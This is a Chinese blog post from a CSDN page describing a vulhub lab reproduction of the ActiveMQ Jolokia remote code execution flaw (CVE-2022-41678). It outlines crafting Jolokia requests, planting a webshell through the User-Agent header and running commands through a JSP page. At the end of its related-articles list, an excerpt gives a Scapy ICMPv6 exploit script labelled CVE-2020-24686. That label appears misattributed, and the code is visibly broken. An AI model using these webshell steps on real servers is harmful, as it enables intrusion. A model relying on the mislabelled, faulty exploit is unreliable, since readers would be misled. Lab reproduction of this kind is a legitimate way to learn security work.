CVE-2022-41678复现学习

最新推荐文章于 2025-05-18 21:34:06 发布

shierbai

最新推荐文章于 2025-05-18 21:34:06 发布

阅读量595

点赞数 5

分类专栏： vulhub复现学习合集文章标签：学习

本文链接：https://blog.youkuaiyun.com/shierbai/article/details/139029724

版权

vulhub复现学习合集专栏收录该内容

21 篇文章

订阅专栏

访问即需要输入密码，进去是在index.html页面，这里切换到admin查看版本5.17.3

教程参考

vulhub漏洞复现学习之activemq_vulhub activemq-优快云博客

什么是API，说人话！-优快云博客

漏洞原理

ActiveMQ中，经过身份验证的攻击者可利用该漏洞，通过Jolokia服务发送特制的HTTP请求写入恶意文件，进而实现远程代码执行。

影响范围

Apache ActiveMQ 5.16.6之前
Apache ActiveMQ 5.17.0-5.17.4（不包括5.17.4版本）
Apache ActiveMQ 5.18.0 不受影响
Apache ActiveMQ 6.0.0 不受影响

复现

复制vulhub上的poc.py到物理机

用poc可以直接打。。

但是此界面实在难受，且是get型无法蚁剑连接，可以在写webshell时用其他工具生成一个post的shell去注入user-agent

然后手动过程就是先发构造好的包获取Mbean值

然后构造payload POST请求提交，XML值在vulhub中的poc.py中已经给出，poc中evil_template内容就是XML ，需要采用\ 和\n进行转义

然后在user-agent字段注入webshell，在poc.py里有

最后再POST提交包，然后XML内容需要替换成POC中的original_template

最后访问ip:port/admin/shelljfr.jsp?cmd=xxxx

就会执行命令xxxx

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

shierbai

关注关注

5
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Confluence漏洞学习——CVE-2021-26084/85，CVE-2022-26134漏洞复现

记录并分享学习安全的知识点..

07-24

3169

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具，通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下，可构造OGNL表达式进行注入，实现在 Confluence Server或Data Center上执行任意代码。 .........

CVE-2022-30525漏洞复现

初岄的博客

06-07

2209

CVE-2022-30525漏洞复现

参与评论您还未登录，请先登录后发表或查看评论

ActiveMQ 远程代码执行漏洞cve-2022-41678复现

weixin_42786460的博客

12-16

1706

ActiveMQ 远程代码执行漏洞cve-2022-41678复现

CVE-2022-41678漏洞复现

m0_66912330的博客

12-20

1952

CVE-2022-41678 是一个 Apache ActiveMQ 中的远程代码执行漏洞，其主要原理是利用了 Jolokia 服务中的不当配置。Jolokia 是一个 JMX 通过 HTTP 的桥接服务，允许通过 HTTP 请求来操作 JMX MBeans。在受影响的 Apache ActiveMQ 版本中，经过身份验证的用户可以通过 /api/jolokia/ 接口操作 MBean。

【漏洞复现】ActiveMQ Jolokia 远程代码执行漏洞 CVE-2022-41678

qq_18193739的博客

12-01

6496

Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678

OpenSSH RCE (CVE-2024-6387) | 附poc | 小试

Lucky小小吴的小屋

07-02

7507

OpenSSH 远程代码执行漏洞(CVE-2024-6387)，该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题，未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。

ActiveMQ Jolokia 代码执行漏洞(CVE-2022-41678)复现

huangyongkang666的博客

12-05

4389

ActiveMQ后台存在Jolokia 代码执行漏洞,在ActiveMQ中，经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean，成功利用此漏洞可导致远程代码执行

vulfocus靶场之redis命令执行cve-2022-0543漏洞复现

没有故事

04-18

1114

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。输入网址和端口，点击OK。

[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)

qq_51577576的博客

03-13

1349

[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像（例如，调整大小）时，生成的图像可能嵌入了任意远程文件的内容（如果ImageMagick二进制文件有权读取它）。

Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现

m0_60635609的博客

04-07

1055

Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下，远程构造OGNL表达式进行注入，在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。（Confluence还有个RCE，为了好区分，我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞，在后续的文章，我也会复现CVE-2021-26084）

Apache ActiveMQ Jolokia 远程代码执行漏洞复现(CVE-2022-41678)

qq_53733257的博客

12-07

2637

不太会调试，所以复现得很困难，踩了不少坑，记录此篇，比较详细。Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2022-41678)分析 | l3yx's blog。

Apache ActiveMQ jolokia 远程代码执行漏洞

时光不老的博客

11-29

2348

该漏洞存在于Jolokia服务的请求处理方式中，结合ActiveMQ的配置不当和Java的高级功能，允许已认证的用户通过发送特定格式的HTTP请求来执行危险操作。ActiveMQ的内部配置允许org.jolokia.http.AgentServlet处理来自/api/jolokia的请求，而没有足够的安全检查来防止恶意操作。

vulhub漏洞复现学习之activemq

m0_60720031的博客

03-07

1077

ActiveMQ是一个开源的消息代理和集成模式服务器，它支持(JMS) API。它是Apache Software Foundation下的一个项目，用于实现消息中间件，帮助不同的应用程序或系统之间进行通信，WEB管理页面默认端口为8161。

Apache ActiveMQ Jolokia 远程代码执行漏洞（CVE-2022-41678）

Flag少侠的博客

10-19

2119

Apache ActiveMQ是一个流行的开源、基于Java的消息代理，支持多种协议，能够为不同语言和平台的客户端提供服务。它支持AMQP、STOMP、MQTT等多种消息协议，能够满足各种消息使用场景。ActiveMQ分为两个版本：经典版（Classic）和下一代版本（Artemis）。经典版拥有成熟的架构和广泛的插件支持，而Artemis版则提供了高性能、非阻塞的架构，适用于新一代的消息应用。

vulhub——ActiveMQ漏洞

qq_55202378的博客

05-22

1704

所以，只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。允许具有代理网络访问权限的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令，从而使代理实例化类路径上的任何类”，问题的根本原因是不安全的反序列化。默认的ActiveMQ账号密码均为admin，首先访问。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。：程序没有限制可在代理中序列化的类，远程攻击者可借助特制的序列化的。

OpenSSH漏洞扫描（CVE-2024-6387、CVE-2006-5051、CVE-2008-4109）

墨痕诉清风的博客

07-02

1109

【代码】OpenSSH漏洞扫描（CVE-2024-6387、CVE-2006-5051、CVE-2008-4109）

开源项目实战学习之YOLO11：12.1 ultralytics-models-sam-blocks.py源码

kngines

05-17

164

开源项目实战学习之YOLO11：12.1 ultralytics-models-sam-blocks.py源码

Adobe Illustrator学习备忘

sdaujz的博客

05-17

359

1.移动对象：需按住空格键加鼠标一块才能拖动。

广域网学习

最新发布

2301_81350613的博客

05-18

593

可以使以太网网络中的多台主机连接到远端的宽带接入服务器。配置本地作为被认证方，以及账号密码信息。功能和指定对端用户名，必须与对端配置的。帧封装到以太网帧中的链路层协议。用户名一致，该名称对端可不设置。提供接入控制、认证等功能。，使内部用户可以上网。

CVE-2020-24686 漏洞复现

03-23

关于 CVE-2020-24686 漏洞，其主要影响的是 Windows TCP/IP 协议栈中的 ICMPv6 路由器广告处理部分。此漏洞源于对递归 DNS 服务器选项（Type 25）的不当解析，特别是当长度字段设置为偶数值时引发的缓冲区溢出问题[^4]。以下是针对该漏洞复现所需的关键要素： ### 实验环境搭建为了成功复现 CVE-2020-24686 漏洞，需准备如下实验环境： 1. **目标操作系统**: 需要运行受影响版本的 Windows 系统，具体包括但不限于 Windows 10 Version 20H2、Windows Server, version 20H2 (Server Core installation) 和其他受支持的操作系统版本。 2. **网络配置**: 设置一个测试网络环境，其中包含一台作为攻击者的机器以及另一台安装有易受攻击操作系统的主机。 3. **工具需求**: - Scapy 或者类似的 Python 库用于构建自定义的 ICMPv6 数据包。 - Wireshark 可选，用来捕获并分析流量以便验证发送的数据包结构是否正确。 ### POC 编写下面是一个简单的基于 Scapy 的 PoC 示例脚本，它会向指定的目标设备发送恶意构造的 ICMPv6 Router Advertisement 包含非法长度值的 Type 25 Option: ```python from scapy.all import * def exploit(target_ip): eth = Ether(dst="ff:ff:ff:ff:ff:ff") # 广播MAC地址 ip6 = IPv6(src="::", dst=target_ip) icmp6_ra = ICMPv6ND_RA() rdnss_opt = ICMPv6NDOptRDNSS(length=2) # 使用不符合RFC标准的偶数长度 payload = "\x00" * ((rdnss_opt.length*8)-len(rdnss_opt.fields_desc)) + struct.pack("!Q", 0xdeadbeefcafebabe) packet = eth/ip6/icmp6_ra/Raw(load=payload) sendp(packet, iface="eth0") if __name__ == "__main__": target_ip = "fe80::xxxx:yyyy:zzzz:wwww" # 替换为目标的实际链路本地IPV6地址 exploit(target_ip) ``` 上述代码片段通过创建具有特定畸形参数的ICMPv6消息来触发潜在的安全风险。注意替换 `target_ip` 参数为你实际环境中受害节点的有效IPv6链接局部地址。 ### 注意事项尽管提供了理论基础和技术细节供学习研究之用，在真实世界里实施此类行为违反法律和服务条款规定。仅限于授权范围内的渗透测试活动才允许尝试这些技术手段。